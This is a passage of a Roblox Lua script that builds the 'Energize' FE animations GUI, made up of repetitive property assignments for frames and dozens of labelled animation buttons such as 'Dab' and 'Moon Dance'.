Instance.new("TextButton")--COMPLETE local MegaInsane = Instance.new("TextButton")--COMPLETE local ArmDetach = Instance.new("TextButton")--COMPLETE local WeirdMove = Instance.new("TextButton")--COMPLETE local Faint = Instance.new("TextButton")--COMPLETE local CloneIllusion = Instance.new("TextButton")--COMPLETE local Levitate = Instance.new("TextButton")--COMPLETE local DinoWalk = Instance.new("TextButton")--COMPLETE local FloorCrawl = Instance.new("TextButton")--COMPLETE local SwordSlam = Instance.new("TextButton")--COMPLETE local LoopHead = Instance.new("TextButton")--COMPLETE local HeroJump = Instance.new("TextButton")--COMPLETE local Insane = Instance.new("TextButton")--COMPLETE local FloatingHead = Instance.new("TextButton")--COMPLETE local HeadThrow = Instance.new("TextButton")--COMPLETE local MovingDance = Instance.new("TextButton")--COMPLETE local SuperPunch = Instance.new("TextButton")--COMPLETE local ArmTurbine = Instance.new("TextButton")--COMPLETE local Dab = Instance.new("TextButton")--COMPLETE local FloatSit = Instance.new("TextButton")--COMPLETE local SuperFaint = Instance.new("TextButton")--COMPLETE local BarrelRoll = Instance.new("TextButton")--COMPLETE local Scared = Instance.new("TextButton")--COMPLETE local InsaneArms = Instance.new("TextButton")--COMPLETE local SwordSlice = Instance.new("TextButton")--COMPLETE local SpinDance2 = Instance.new("TextButton")--COMPLETE local BowDown = Instance.new("TextButton")--COMPLETE local LoopSlam = Instance.new("TextButton")--COMPLETE local GuiTopFrame = Instance.new("Frame") -- Top of the main frame local CloseGUI = Instance.new("TextButton") -- To close the GUI local Title = Instance.new("TextLabel") -- Actual title of GUI, Energize -- Properties Energize.Name = "Energize" Energize.Parent = game:GetService("Players").LocalPlayer.PlayerGui SideFrame.Name = "SideFrame" SideFrame.Parent = Energize SideFrame.Active = true SideFrame.BackgroundColor3 = Color3.new(1, 0.329412, 0.329412) SideFrame.Draggable = true SideFrame.Position = UDim2.new(0, 376, 0, 125) SideFrame.Size = UDim2.new(0, 460, 0, 32) SideFrame.Visible = false OpenGUI.Name = "OpenGUI" OpenGUI.Parent = SideFrame OpenGUI.BackgroundColor3 = Color3.new(1, 1, 1) OpenGUI.BackgroundTransparency = 1 OpenGUI.Position = UDim2.new(0, 426, 0, 0) OpenGUI.Size = UDim2.new(0, 34, 0, 32) OpenGUI.Font = Enum.Font.SourceSans OpenGUI.FontSize = Enum.FontSize.Size48 OpenGUI.Text = "X" OpenGUI.TextColor3 = Color3.new(0.333333, 0, 0) OpenGUI.TextSize = 40 OpenGUI.TextWrapped = true SideFrameTitle.Name = "SideFrameTitle" SideFrameTitle.Parent = SideFrame SideFrameTitle.BackgroundColor3 = Color3.new(1, 1, 1) SideFrameTitle.BackgroundTransparency = 1 SideFrameTitle.Position = UDim2.new(0, 170, 0, 0) SideFrameTitle.Size = UDim2.new(0, 119, 0, 31) SideFrameTitle.Font = Enum.Font.Arial SideFrameTitle.FontSize = Enum.FontSize.Size24 SideFrameTitle.Text = "-Energize-" SideFrameTitle.TextSize = 21 SideFrameTitle.TextStrokeColor3 = Color3.new(0.27451, 0.92549, 0.905882) SideFrameTitle.TextStrokeTransparency = 0.69999998807907 MainFrame.Name = "MainFrame" MainFrame.Parent = Energize MainFrame.Active = true MainFrame.BackgroundColor3 = Color3.new(1, 1, 1) MainFrame.BackgroundTransparency = 1 MainFrame.Draggable = true MainFrame.Position = UDim2.new(0, 376, 0, 125) MainFrame.Size = UDim2.new(0, 444, 0, 280) GuiBottomFrame.Name = "Gui BottomFrame" GuiBottomFrame.Parent = MainFrame GuiBottomFrame.BackgroundColor3 = Color3.new(1, 0.329412, 0.329412) GuiBottomFrame.BorderColor3 = Color3.new(0.243137, 0.243137, 0.243137) GuiBottomFrame.Position = UDim2.new(0, 0, 0, 247) GuiBottomFrame.Size = UDim2.new(0, 460, 0, 32) Credits.Name = "Credits" Credits.Parent = GuiBottomFrame Credits.BackgroundColor3 = Color3.new(1, 1, 1) Credits.BackgroundTransparency = 1 Credits.Size = UDim2.new(0, 460, 0, 32) Credits.FontSize = Enum.FontSize.Size14 Credits.Text = "By illremember -FE Animations Gui" Credits.TextColor3 = Color3.new(0.219608, 0.219608, 0.219608) Credits.TextSize = 14 Credits.TextStrokeColor3 = Color3.new(0.141176, 0.870588, 0.713726) Credits.TextStrokeTransparency = 0.69999998807907 Credits.TextWrapped = true ScrollingFrame.Parent = MainFrame ScrollingFrame.BackgroundColor3 = Color3.new(1, 0.564706, 0.564706) ScrollingFrame.Position = UDim2.new(0, 0, 0, 32) ScrollingFrame.Size = UDim2.new(0, 460, 0, 215) ScrollingFrame.ScrollBarThickness = 13 FullSwing.Name = "FullSwing" FullSwing.Parent = ScrollingFrame FullSwing.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) FullSwing.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) FullSwing.Position = UDim2.new(0, 17, 0, 322) FullSwing.Size = UDim2.new(0, 119, 0, 34) FullSwing.Font = Enum.Font.Highway FullSwing.FontSize = Enum.FontSize.Size24 FullSwing.Text = "Full Swing" FullSwing.TextSize = 20 FullSwing.TextWrapped = true GlitchLevitate.Name = "GlitchLevitate" GlitchLevitate.Parent = ScrollingFrame GlitchLevitate.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) GlitchLevitate.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) GlitchLevitate.Position = UDim2.new(0, 319, 0, 322) GlitchLevitate.Size = UDim2.new(0, 119, 0, 34) GlitchLevitate.Font = Enum.Font.Highway GlitchLevitate.FontSize = Enum.FontSize.Size24 GlitchLevitate.Text = "Glitch Levitate" GlitchLevitate.TextSize = 20 GlitchLevitate.TextWrapped = true MoonDance.Name = "MoonDance" MoonDance.Parent = ScrollingFrame MoonDance.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) MoonDance.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) MoonDance.Position = UDim2.new(0, 319, 0, 280) MoonDance.Size = UDim2.new(0, 119, 0, 34) MoonDance.Font = Enum.Font.Highway MoonDance.FontSize = Enum.FontSize.Size24 MoonDance.Text = "Moon Dance" MoonDance.TextSize = 20 MoonDance.TextWrapped = true FullPunch.Name = "FullPunch" FullPunch.Parent = ScrollingFrame FullPunch.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) FullPunch.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) FullPunch.Position = UDim2.new(0, 17, 0, 280) FullPunch.Size = UDim2.new(0, 119, 0, 34) FullPunch.Font = Enum.Font.Highway FullPunch.FontSize = Enum.FontSize.Size24 FullPunch.Text = "Full Punch" FullPunch.TextSize = 20 FullPunch.TextWrapped = true Crouch.Name = "Crouch" Crouch.Parent = ScrollingFrame Crouch.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) Crouch.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Crouch.Position = UDim2.new(0, 168, 0, 280) Crouch.Size = UDim2.new(0, 119, 0, 34) Crouch.Font = Enum.Font.Highway Crouch.FontSize = Enum.FontSize.Size24 Crouch.Text = "Crouch" Crouch.TextSize = 20 Crouch.TextWrapped = true SpinDance.Name = "SpinDance" SpinDance.Parent = ScrollingFrame SpinDance.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) SpinDance.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) SpinDance.Position = UDim2.new(0, 168, 0, 236) SpinDance.Size = UDim2.new(0, 119, 0, 34) SpinDance.Font = Enum.Font.Highway SpinDance.FontSize = Enum.FontSize.Size24 SpinDance.Text = "Spin Dance" SpinDance.TextSize = 20 SpinDance.TextWrapped = true FloorFaint.Name = "FloorFaint" FloorFaint.Parent = ScrollingFrame FloorFaint.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) FloorFaint.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) FloorFaint.Position = UDim2.new(0, 17, 0, 236) FloorFaint.Size = UDim2.new(0, 119, 0, 34) FloorFaint.Font = Enum.Font.Highway FloorFaint.FontSize = Enum.FontSize.Size24 FloorFaint.Text = "Floor Faint" FloorFaint.TextSize = 20 FloorFaint.TextWrapped = true JumpingJacks.Name = "JumpingJacks" JumpingJacks.Parent = ScrollingFrame JumpingJacks.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) JumpingJacks.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) JumpingJacks.Position = UDim2.new(0, 319, 0, 236) JumpingJacks.Size = UDim2.new(0, 119, 0, 34) JumpingJacks.Font = Enum.Font.Highway JumpingJacks.FontSize = Enum.FontSize.Size24 JumpingJacks.Text = "Jumping Jacks" JumpingJacks.TextSize = 20 JumpingJacks.TextWrapped = true Spinner.Name = "Spinner" Spinner.Parent = ScrollingFrame Spinner.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) Spinner.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Spinner.Position = UDim2.new(0, 17, 0, 192) Spinner.Size = UDim2.new(0, 119, 0, 34) Spinner.Font = Enum.Font.Highway Spinner.FontSize = Enum.FontSize.Size24 Spinner.Text = "Spinner" Spinner.TextSize = 20 Spinner.TextWrapped = true MegaInsane.Name = "MegaInsane" MegaInsane.Parent = ScrollingFrame MegaInsane.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) MegaInsane.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) MegaInsane.Position = UDim2.new(0, 168, 0, 192) MegaInsane.Size = UDim2.new(0, 119, 0, 34) MegaInsane.Font = Enum.Font.Highway MegaInsane.FontSize = Enum.FontSize.Size24 MegaInsane.Text = "Mega Insane" MegaInsane.TextSize = 20 MegaInsane.TextWrapped = true ArmDetach.Name = "ArmDetach" ArmDetach.Parent = ScrollingFrame ArmDetach.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) ArmDetach.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) ArmDetach.Position = UDim2.new(0, 319, 0, 192) ArmDetach.Size = UDim2.new(0, 119, 0, 34) ArmDetach.Font = Enum.Font.Highway ArmDetach.FontSize = Enum.FontSize.Size24 ArmDetach.Text = "Arm Detach" ArmDetach.TextSize = 20 ArmDetach.TextWrapped = true WeirdMove.Name = "WeirdMove" WeirdMove.Parent = ScrollingFrame WeirdMove.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) WeirdMove.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) WeirdMove.Position = UDim2.new(0, 168, 0, 148) WeirdMove.Size = UDim2.new(0, 119, 0, 34) WeirdMove.Font = Enum.Font.Highway WeirdMove.FontSize = Enum.FontSize.Size24 WeirdMove.Text = "Weird Move" WeirdMove.TextSize = 20 WeirdMove.TextWrapped = true Faint.Name = "Faint" Faint.Parent = ScrollingFrame Faint.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) Faint.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Faint.Position = UDim2.new(0, 17, 0, 148) Faint.Size = UDim2.new(0, 119, 0, 34) Faint.Font = Enum.Font.Highway Faint.FontSize = Enum.FontSize.Size24 Faint.Text = "Faint" Faint.TextSize = 20 Faint.TextWrapped = true CloneIllusion.Name = "CloneIllusion" CloneIllusion.Parent = ScrollingFrame CloneIllusion.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) CloneIllusion.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) CloneIllusion.Position = UDim2.new(0, 319, 0, 148) CloneIllusion.Size = UDim2.new(0, 119, 0, 34) CloneIllusion.Font = Enum.Font.Highway CloneIllusion.FontSize = Enum.FontSize.Size24 CloneIllusion.Text = "Clone Illusion" CloneIllusion.TextSize = 20 CloneIllusion.TextWrapped = true Levitate.Name = "Levitate" Levitate.Parent = ScrollingFrame Levitate.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) Levitate.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Levitate.Position = UDim2.new(0, 17, 0, 104) Levitate.Size = UDim2.new(0, 119, 0, 34) Levitate.Font = Enum.Font.Highway Levitate.FontSize = Enum.FontSize.Size24 Levitate.Text = "Levitate" Levitate.TextSize = 20 Levitate.TextWrapped = true DinoWalk.Name = "DinoWalk" DinoWalk.Parent = ScrollingFrame DinoWalk.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) DinoWalk.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) DinoWalk.Position = UDim2.new(0, 168, 0, 104) DinoWalk.Size = UDim2.new(0, 119, 0, 34) DinoWalk.Font = Enum.Font.Highway DinoWalk.FontSize = Enum.FontSize.Size24 DinoWalk.Text = "Dino Walk" DinoWalk.TextSize = 20 DinoWalk.TextWrapped = true FloorCrawl.Name = "FloorCrawl" FloorCrawl.Parent = ScrollingFrame FloorCrawl.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) FloorCrawl.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) FloorCrawl.Position = UDim2.new(0, 319, 0, 104) FloorCrawl.Size = UDim2.new(0, 119, 0, 34) FloorCrawl.Font = Enum.Font.Highway FloorCrawl.FontSize = Enum.FontSize.Size24 FloorCrawl.Text = "Floor Crawl" FloorCrawl.TextSize = 20 FloorCrawl.TextWrapped = true SwordSlam.Name = "SwordSlam" SwordSlam.Parent = ScrollingFrame SwordSlam.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) SwordSlam.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) SwordSlam.Position = UDim2.new(0, 319, 0, 60) SwordSlam.Size = UDim2.new(0, 119, 0, 34) SwordSlam.Font = Enum.Font.Highway SwordSlam.FontSize = Enum.FontSize.Size24 SwordSlam.Text = "Sword Slam" SwordSlam.TextSize = 20 SwordSlam.TextWrapped = true LoopHead.Name = "LoopHead" LoopHead.Parent = ScrollingFrame LoopHead.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) LoopHead.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) LoopHead.Position = UDim2.new(0, 168, 0, 60) LoopHead.Size = UDim2.new(0, 119, 0, 34) LoopHead.Font = Enum.Font.Highway LoopHead.FontSize = Enum.FontSize.Size24 LoopHead.Text = "Loop Head" LoopHead.TextSize = 20 LoopHead.TextWrapped = true HeroJump.Name = "HeroJump" HeroJump.Parent = ScrollingFrame HeroJump.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) HeroJump.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) HeroJump.Position = UDim2.new(0, 17, 0, 60) HeroJump.Size = UDim2.new(0, 119, 0, 34) HeroJump.Font = Enum.Font.Highway HeroJump.FontSize = Enum.FontSize.Size24 HeroJump.Text = "Hero Jump" HeroJump.TextSize = 20 HeroJump.TextWrapped = true Insane.Name = "Insane" Insane.Parent = ScrollingFrame Insane.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) Insane.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Insane.Position = UDim2.new(0, 319, 0, 16) Insane.Size = UDim2.new(0, 119, 0, 34) Insane.Font = Enum.Font.Highway Insane.FontSize = Enum.FontSize.Size24 Insane.Text = "Insane" Insane.TextSize = 20 Insane.TextWrapped = true FloatingHead.Name = "FloatingHead" FloatingHead.Parent = ScrollingFrame FloatingHead.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) FloatingHead.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) FloatingHead.Position = UDim2.new(0, 168, 0, 16) FloatingHead.Size = UDim2.new(0, 119, 0, 34) FloatingHead.Font = Enum.Font.Highway FloatingHead.FontSize = Enum.FontSize.Size24 FloatingHead.Text = "Floating Head" FloatingHead.TextSize = 20 FloatingHead.TextWrapped = true HeadThrow.Name = "HeadThrow" HeadThrow.Parent = ScrollingFrame HeadThrow.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) HeadThrow.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) HeadThrow.Position = UDim2.new(0, 17, 0, 16) HeadThrow.Size = UDim2.new(0, 119, 0, 34) HeadThrow.Font = Enum.Font.Highway HeadThrow.FontSize = Enum.FontSize.Size24 HeadThrow.Text = "Head Throw" HeadThrow.TextSize = 20 HeadThrow.TextWrapped = true MovingDance.Name = "MovingDance" MovingDance.Parent = ScrollingFrame MovingDance.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) MovingDance.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) MovingDance.Position = UDim2.new(0, 168, 0, 324) MovingDance.Size = UDim2.new(0, 119, 0, 34) MovingDance.Font = Enum.Font.Highway MovingDance.FontSize = Enum.FontSize.Size24 MovingDance.Text = "Moving Dance" MovingDance.TextSize = 20 MovingDance.TextWrapped = true SuperPunch.Name = "SuperPunch" SuperPunch.Parent = ScrollingFrame SuperPunch.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) SuperPunch.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) SuperPunch.Position = UDim2.new(0, 168, 0, 366) SuperPunch.Size = UDim2.new(0, 119, 0, 34) SuperPunch.Font = Enum.Font.Highway SuperPunch.FontSize = Enum.FontSize.Size24 SuperPunch.Text = "Super Punch" SuperPunch.TextSize = 20 SuperPunch.TextWrapped = true ArmTurbine.Name = "ArmTurbine" ArmTurbine.Parent = ScrollingFrame ArmTurbine.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) ArmTurbine.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) ArmTurbine.Position = UDim2.new(0, 319, 0, 366) ArmTurbine.Size = UDim2.new(0, 119, 0, 34) ArmTurbine.Font = Enum.Font.Highway ArmTurbine.FontSize = Enum.FontSize.Size24 ArmTurbine.Text = "Arm Turbine" ArmTurbine.TextSize = 20 ArmTurbine.TextWrapped = true Dab.Name = "Dab" Dab.Parent = ScrollingFrame Dab.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) Dab.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Dab.Position = UDim2.new(0, 17, 0, 366) Dab.Size = UDim2.new(0, 119, 0, 34) Dab.Font = Enum.Font.Highway Dab.FontSize = Enum.FontSize.Size24 Dab.Text = "Dab" Dab.TextSize = 20 Dab.TextWrapped = true FloatSit.Name = "FloatSit" FloatSit.Parent = ScrollingFrame FloatSit.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) FloatSit.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) FloatSit.Position = UDim2.new(0, 168, 0, 410) FloatSit.Size = UDim2.new(0, 119, 0, 34) FloatSit.Font = Enum.Font.Highway FloatSit.FontSize = Enum.FontSize.Size24 FloatSit.Text = "Float Sit" FloatSit.TextSize = 20 FloatSit.TextWrapped = true SuperFaint.Name = "SuperFaint" SuperFaint.Parent = ScrollingFrame SuperFaint.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) SuperFaint.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) SuperFaint.Position = UDim2.new(0, 17, 0, 498) SuperFaint.Size = UDim2.new(0, 119, 0, 34) SuperFaint.Font = Enum.Font.Highway SuperFaint.FontSize = Enum.FontSize.Size24 SuperFaint.Text = "Super Faint" SuperFaint.TextSize = 20 SuperFaint.TextWrapped = true BarrelRoll.Name = "BarrelRoll" BarrelRoll.Parent = ScrollingFrame BarrelRoll.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) BarrelRoll.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) BarrelRoll.Position = UDim2.new(0, 319, 0, 410) BarrelRoll.Size = UDim2.new(0, 119, 0, 34) BarrelRoll.Font = Enum.Font.Highway BarrelRoll.FontSize = Enum.FontSize.Size24 BarrelRoll.Text = "Barrel Roll" BarrelRoll.TextSize = 20 BarrelRoll.TextWrapped = true Scared.Name = "Scared" Scared.Parent = ScrollingFrame Scared.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) Scared.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Scared.Position = UDim2.new(0, 319, 0, 454) Scared.Size = UDim2.new(0, 119, 0, 34) Scared.Font = Enum.Font.Highway Scared.FontSize = Enum.FontSize.Size24 Scared.Text = "Scared" Scared.TextSize = 20 Scared.TextWrapped = true InsaneArms.Name = "InsaneArms" InsaneArms.Parent = ScrollingFrame InsaneArms.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) InsaneArms.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) InsaneArms.Position = UDim2.new(0, 17, 0, 454) InsaneArms.Size = UDim2.new(0, 119, 0, 34) InsaneArms.Font = Enum.Font.Highway InsaneArms.FontSize = Enum.FontSize.Size24 InsaneArms.Text = "Insane Arms" InsaneArms.TextSize = 20 InsaneArms.TextWrapped = true SwordSlice.Name = "SwordSlice" SwordSlice.Parent = ScrollingFrame SwordSlice.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) SwordSlice.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) SwordSlice.Position = UDim2.new(0, 168, 0, 454) SwordSlice.Size = UDim2.new(0, 119, 0, 34) SwordSlice.Font = Enum.Font.Highway SwordSlice.FontSize = Enum.FontSize.Size24 SwordSlice.Text = "Sword Slice" SwordSlice.TextSize = 20 SwordSlice.TextWrapped = true SpinDance2.Name = "SpinDance2" SpinDance2.Parent = ScrollingFrame SpinDance2.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) SpinDance2.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) SpinDance2.Position = UDim2.new(0, 168, 0, 498) SpinDance2.Size = UDim2.new(0, 119, 0, 34) SpinDance2.Font = Enum.Font.Highway SpinDance2.FontSize = Enum.FontSize.Size24 SpinDance2.Text = "Spin Dance 2" SpinDance2.TextSize = 20 SpinDance2.TextWrapped = true BowDown.Name = "BowDown" BowDown.Parent = ScrollingFrame BowDown.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) BowDown.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) BowDown.Position = UDim2.new(0, 319, 0, 498) BowDown.Size = UDim2.new(0, 119, 0, 34) BowDown.Font = Enum.Font.Highway BowDown.FontSize = Enum.FontSize.Size24 BowDown.Text = "Bow Down" BowDown.TextSize = 20 BowDown.TextWrapped = true LoopSlam.Name = "LoopSlam" LoopSlam.Parent = ScrollingFrame LoopSlam.BackgroundColor3 = Color3.new(0.886275, 0.776471, 0.368627) LoopSlam.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) LoopSlam.Position = UDim2.new(0, 17, 0, 410) LoopSlam.Size = UDim2.new(0, 119, 0, 34) LoopSlam.Font = Enum.Font.Highway LoopSlam.FontSize = Enum.FontSize.Size24 LoopSlam.Text = "Loop Slam" LoopSlam.TextSize = 20 LoopSlam.TextWrapped = true GuiTopFrame.Name = "Gui TopFrame" GuiTopFrame.Parent = MainFrame GuiTopFrame.BackgroundColor3 = Color3.new(1, 0.329412, 0.329412) GuiTopFrame.BorderColor3 = Color3.new(0.243137, 0.243137, 0.243137) GuiTopFrame.Size = UDim2.new(0, 460, 0, 32) CloseGUI.Name = "CloseGUI" CloseGUI.Parent = GuiTopFrame CloseGUI.BackgroundColor3 = Color3.new(1, 1, 1) CloseGUI.BackgroundTransparency = 1 CloseGUI.Position = UDim2.new(0, 426, 0, 0) CloseGUI.Size = UDim2.new(0, 34, 0, 32) CloseGUI.Font = Enum.Font.SourceSans CloseGUI.FontSize = Enum.FontSize.Size48 CloseGUI.Text = "X" CloseGUI.TextColor3 = Color3.new(0.333333, 0, 0) CloseGUI.TextSize = 40 CloseGUI.TextWrapped = true Title.Name = "Title" Title.Parent = GuiTopFrame Title.BackgroundColor3 = Color3.new(1, 1, 1) Title.BackgroundTransparency = 1 Title.Size = UDim2.new(0, 460, 0, 32) Title.FontSize = Enum.FontSize.Size14 Title.Text = "-Energize-" Title.TextColor3 = Color3.new(0.164706, 0.164706, 0.164706) Title.TextSize = 14 Title.TextStrokeColor3 = Color3.new(0.384314, 0.917647, 1) Title.TextStrokeTransparency = 0.69999998807907 Title.TextWrapped = true CheckR.Name = "CheckR" CheckR.Parent = GuiTopFrame CheckR.BackgroundColor3 = Color3.new(1, 1, 1) CheckR.BackgroundTransparency = 1 CheckR.Size = UDim2.new(0, 171, 0, 32) CheckR.Font = Enum.Font.SourceSansBold CheckR.FontSize = Enum.FontSize.Size14 CheckR.Text = "Text" CheckR.TextScaled = true CheckR.TextSize = 14 CheckR.TextWrapped = true ScrollingFrameR15.Name = "ScrollingFrameR15" ScrollingFrameR15.Parent = MainFrame ScrollingFrameR15.BackgroundColor3 = Color3.new(1, 0.564706, 0.564706) ScrollingFrameR15.Position = UDim2.new(0, 0, 0, 32) ScrollingFrameR15.Size = UDim2.new(0, 460, 0, 215) ScrollingFrameR15.Visible = false ScrollingFrameR15.ScrollBarThickness = 13 CrazySlash.Name = "CrazySlash" CrazySlash.Parent = ScrollingFrameR15 CrazySlash.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) CrazySlash.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) CrazySlash.Position = UDim2.new(0, 17, 0, 16) CrazySlash.Size = UDim2.new(0, 119, 0, 34) CrazySlash.Font = Enum.Font.Highway CrazySlash.FontSize = Enum.FontSize.Size24 CrazySlash.Text = "CrazySlash" CrazySlash.TextSize = 20 CrazySlash.TextWrapped = true Open.Name = "Open" Open.Parent = ScrollingFrameR15 Open.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) Open.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Open.Position = UDim2.new(0, 168, 0, 16) Open.Size = UDim2.new(0, 119, 0, 34) Open.Font = Enum.Font.Highway Open.FontSize = Enum.FontSize.Size24 Open.Text = "Open" Open.TextSize = 20 Open.TextWrapped = true R15Spinner.Name = "R15Spinner" R15Spinner.Parent = ScrollingFrameR15 R15Spinner.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) R15Spinner.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) R15Spinner.Position = UDim2.new(0, 17, 0, 60) R15Spinner.Size = UDim2.new(0, 119, 0, 34) R15Spinner.Font = Enum.Font.Highway R15Spinner.FontSize = Enum.FontSize.Size24 R15Spinner.Text = "Spinner" R15Spinner.TextSize = 20 R15Spinner.TextWrapped = true ArmsOut.Name = "ArmsOut" ArmsOut.Parent = ScrollingFrameR15 ArmsOut.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) ArmsOut.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) ArmsOut.Position = UDim2.new(0, 319, 0, 16) ArmsOut.Size = UDim2.new(0, 119, 0, 34) ArmsOut.Font = Enum.Font.Highway ArmsOut.FontSize = Enum.FontSize.Size24 ArmsOut.Text = "ArmsOut" ArmsOut.TextSize = 20 ArmsOut.TextWrapped = true FloatSlash.Name = "FloatSlash" FloatSlash.Parent = ScrollingFrameR15 FloatSlash.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) FloatSlash.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) FloatSlash.Position = UDim2.new(0, 168, 0, 148) FloatSlash.Size = UDim2.new(0, 119, 0, 34) FloatSlash.Font = Enum.Font.Highway FloatSlash.FontSize = Enum.FontSize.Size24 FloatSlash.Text = "FloatSlash" FloatSlash.TextSize = 20 FloatSlash.TextWrapped = true WeirdZombie.Name = "WeirdZombie" WeirdZombie.Parent = ScrollingFrameR15 WeirdZombie.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) WeirdZombie.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) WeirdZombie.Position = UDim2.new(0, 17, 0, 148) WeirdZombie.Size = UDim2.new(0, 119, 0, 34) WeirdZombie.Font = Enum.Font.Highway WeirdZombie.FontSize = Enum.FontSize.Size24 WeirdZombie.Text = "WeirdZombie" WeirdZombie.TextSize = 20 WeirdZombie.TextWrapped = true DownSlash.Name = "DownSlash" DownSlash.Parent = ScrollingFrameR15 DownSlash.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) DownSlash.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) DownSlash.Position = UDim2.new(0, 319, 0, 148) DownSlash.Size = UDim2.new(0, 119, 0, 34) DownSlash.Font = Enum.Font.Highway DownSlash.FontSize = Enum.FontSize.Size24 DownSlash.Text = "DownSlash" DownSlash.TextSize = 20 DownSlash.TextWrapped = true Pull.Name = "Pull" Pull.Parent = ScrollingFrameR15 Pull.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) Pull.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Pull.Position = UDim2.new(0, 17, 0, 104) Pull.Size = UDim2.new(0, 119, 0, 34) Pull.Font = Enum.Font.Highway Pull.FontSize = Enum.FontSize.Size24 Pull.Text = "Pull" Pull.TextSize = 20 Pull.TextWrapped = true CircleArm.Name = "CircleArm" CircleArm.Parent = ScrollingFrameR15 CircleArm.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) CircleArm.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) CircleArm.Position = UDim2.new(0, 168, 0, 104) CircleArm.Size = UDim2.new(0, 119, 0, 34) CircleArm.Font = Enum.Font.Highway CircleArm.FontSize = Enum.FontSize.Size24 CircleArm.Text = "CircleArm" CircleArm.TextSize = 20 CircleArm.TextWrapped = true Bend.Name = "Bend" Bend.Parent = ScrollingFrameR15 Bend.BackgroundColor3 = Color3.new(0.682353, 0.701961, 0.792157) Bend.BorderColor3 = Color3.new(0.313726, 0.313726, 0.313726) Bend.Position = UDim2.new(0, 